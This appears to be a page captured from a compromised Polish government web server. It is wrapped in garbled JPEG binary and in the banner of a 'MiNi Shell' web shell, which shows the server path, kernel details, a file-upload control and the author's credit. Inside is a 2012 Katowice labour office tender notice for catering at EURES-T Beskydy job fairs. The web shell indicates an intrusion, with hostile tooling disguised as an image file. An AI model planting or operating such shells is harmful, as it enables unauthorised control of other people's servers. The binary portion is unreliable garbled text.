JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120301/49209-N-2012.html

<p class="kh_header"><b>Katowice: ŚWIADCZENIE USŁUGI CATERINGOWEJ PODCZAS WYDARZEŃ REALIZOWANYCH  W RAMACH PARTNERSTWA EURES - T BESKYDY</b><br>
<b>Numer ogłoszenia: 49209 - 2012; data zamieszczenia: 01.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu województwa nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUGI CATERINGOWEJ PODCZAS WYDARZEŃ REALIZOWANYCH  W RAMACH PARTNERSTWA EURES - T BESKYDY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Przedmiotem zamówienia jest świadczenie usługi cateringowej dla gości i wystawców biorących udział w następujących wydarzeniach realizowanych w ramach Partnerstwa EURES-T Beskydy:
- zadanie 1: Transgraniczne Targi Pracy, Przedsiębiorczości i Edukacji w Cieszynie - 18.04.2012r., usługa dla 120 osób;
- zadanie 2:  Młodzieżowe Dni Pracy EURES-T Beskydy w Żywcu, organizowane przez WUP Katowice we współpracy z Centrum Edukacji i Pracy Młodzieży OHP - 16.05.2012r., usługa dla  70 osób;  
- zadanie 3:  Targi Pracy, Praktyk i Wolontariatu - Młodzieżowe Dni Pracy EURES-T Beskydy w Bielsku - Białej, organizowane przez WUP Katowice we współpracy z Centrum Edukacji i Pracy Młodzieży OHP - 18.05.2012r., usługa dla  70 osób.  

Szczegółowy opis:

Zadanie 1 :
Usługa cateringowa dla gości i wystawców biorących udział w Transgranicznych Targach Pracy, Przedsiębiorczości i Edukacji w Cieszynie w dniu 18.04.2012r., usługa dla 120 osób.
Usługa świadczona będzie w Zamku Cieszyn, w pomieszczeniu udostępnionym przez Zamawiającego. 
Na usługę składać się będą:
a) napoje gorące:
- kawa wysokogatunkowa podana w termosach, wraz z dodatkami - mleczko lub śmietanka, cukier (bez ograniczeń), 
- herbata wysokogatunkowa podana w termosach, wraz z dodatkami - cytryna, cukier (bez ograniczeń), 
b) napoje zimne:
- woda mineralna niegazowana (80 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (80 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (60 porcji x 200 ml), jabłkowy (60 porcji x 200 ml), z czarnej porzeczki (60 porcji x 200 ml), podawane w szklanych dzbankach, 
c)  kanapki bankietowe na białym i ciemnym pieczywie - łącznie 240 sztuk:
- z szynką, pomidorem, serem mozarellą i bazylią (40 szt),
- z camembertem i orzechem włoskim (40 szt),
- z twarożkiem, szczypiorkiem i orzechem włoskim (40 szt.),
- z łososiem, cytrynką i koperkiem (40 szt.),
- z jajkiem i kolorowym kawiorem (40 szt.),
- z żółtym serem i oliwkami (40 szt.); 
d) sałatki - 2 rodzaje:
- sałatka grecka (70 porcji x 100 g)
- sałatka hawajska z kurczakiem, ananasem, kukurydzą i majonezem (70 porcji x 100 g),
e) mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) w ilości nie mniejszej niż 30g na osobę 
z każdego rodzaju, 
f) ciasta pieczone: 
- szarlotka (70 porcji),
- ciasto keksowe (70 porcji), 
g) przekąski koktajlowe - łącznie 360 sztuk: 
- koreczki mini caprese - mozarella i pomidorki (60 szt.)
- koreczki z serem żółtym i kabanosem (60 szt.)
- koreczki z salami, mini kolbą kukurydzy i papryką (60 szt.)
- babeczki z łososiem wędzonym (60 szt.)
- jajka faszerowane z pieczarką (60 szt.)
- mini - quiche z brokułami i tuńczykiem (60 szt)
h) ciepły posiłek (do podania w podgrzewaczach na godz. 12:00)
- bogracz, strogonow lub równoważne danie firmowe (80 porcji x 200 ml) 
- pierogi mieszane - ruskie, z mięsem, z kapustą i grzybami (80 porcji x 200 g), 
- pieczywo mieszane (białe, ciemne - 80 porcji x 50 g)
i) zastawa biała porcelanowa lub ceramiczna, sztućce trwałe 
j) dekoracja stołu (obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe)
k) obsługa kelnerska przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00). 
l) produkty do rozłożenia na stoiskach targowych: 
	- 45 butelek (500 ml) wody mineralnej gazowanej,
	- 45 butelek (500 ml) wody mineralnej niegazowanej,
	- 100 kubeczków jednorazowych,
	- słone paluszki (45 opakowań po min. 70g). 
ł) transport. 
Catering powinien zostać udostępniony gościom nie później niż od godz. 9:00. 

Zadanie 2 :
Usługa cateringowa dla gości i wystawców biorących udział w Młodzieżowych Dniach Pracy EURES-T Beskydy  w Żywcu w dniu 16.05.2012r., usługa dla 70 osób.
Targi odbędą się na terenie miasta Żywiec w godz. 9:00 - 14:00. Wykonawca zobowiązany będzie do dostarczenia cateringu na 1 godz. przed rozpoczęciem wydarzenia do miejsca odbywania Targów, które zostanie wskazane wyłonionemu Wykonawcy w dniu podpisania umowy.
Na usługę składać się będą:
a) napoje gorące:
- kawa wysokogatunkowa podana w termosach, wraz z dodatkami - mleczko lub śmietanka, cukier (bez ograniczeń), 
- herbata wysokogatunkowa podana w termosach, wraz z dodatkami - cytryna, cukier (bez ograniczeń), 
b) napoje zimne:
- woda mineralna niegazowana (70 butelek plastikowych o poj. 0,5l), 
- sok jabłkowy (70 porcji x 200 ml) podawane w szklanych dzbankach, 
c) mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) w ilości nie mniejszej niż 30g na osobę z każdego rodzaju, 
c)  kanapki bankietowe na białym i ciemnym pieczywie - łącznie 105 sztuk: 
- z szynką, pomidorem, serem mozarellą i bazylią (35 szt.),
- z camembertem i orzechem włoskim (35 szt),
- z twarożkiem, szczypiorkiem i orzechem włoskim (35 szt.), 
d) zastawa biała porcelanowa lub ceramiczna, sztućce trwałe 
e) dekoracja stołu (obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe)
f) obsługa kelnerska przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00). 
g) transport. 

Zadanie 3 :
 Usługa cateringowa dla gości i wystawców biorących udział w Targach Pracy, Praktyk 
i Wolontariatu - Młodzieżowych Dniach Pracy EURES-T Beskydy  w Bielsku - Białej w dniu 18.05.2012r., usługa dla 70 osób.
Usługa świadczona będzie w budynku Wyższej Szkoły Administracji w Bielsku - Białej (Plac Lutra 7), w pomieszczeniu udostępnionym przez Zamawiającego. 
Na usługę składać się będą:
a) napoje gorące:
- kawa wysokogatunkowa podana w termosach, wraz z dodatkami - mleczko lub śmietanka, cukier (bez ograniczeń), 
- herbata wysokogatunkowa podana w termosach, wraz z dodatkami - cytryna, cukier (bez ograniczeń), 
b) mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) w ilości nie mniejszej niż 30g na osobę 
z każdego rodzaju, 
c)  kanapki bankietowe na białym i ciemnym pieczywie - łącznie 175 sztuk: 
- z szynką, pomidorem, serem mozarellą i bazylią (35 szt.),
- z łososiem, cytrynką i koperkiem (35 szt.),
- z żółtym serem i oliwkami (35 szt.); 
- z camembertem i orzechem włoskim (35 szt),
- z twarożkiem, szczypiorkiem i orzechem włoskim (35 szt.),
d) zastawa biała porcelanowa lub ceramiczna, sztućce trwałe 
e) dekoracja stołu (obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe)
f) obsługa kelnerska przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00). 
g) transport. 
Catering powinien zostać udostępniony gościom nie później niż od godz. 9:00..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 18.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 305, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2012 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 210- Kancelaria Urzędu, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Grant EURES-T BESKYDY 2011/2012.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com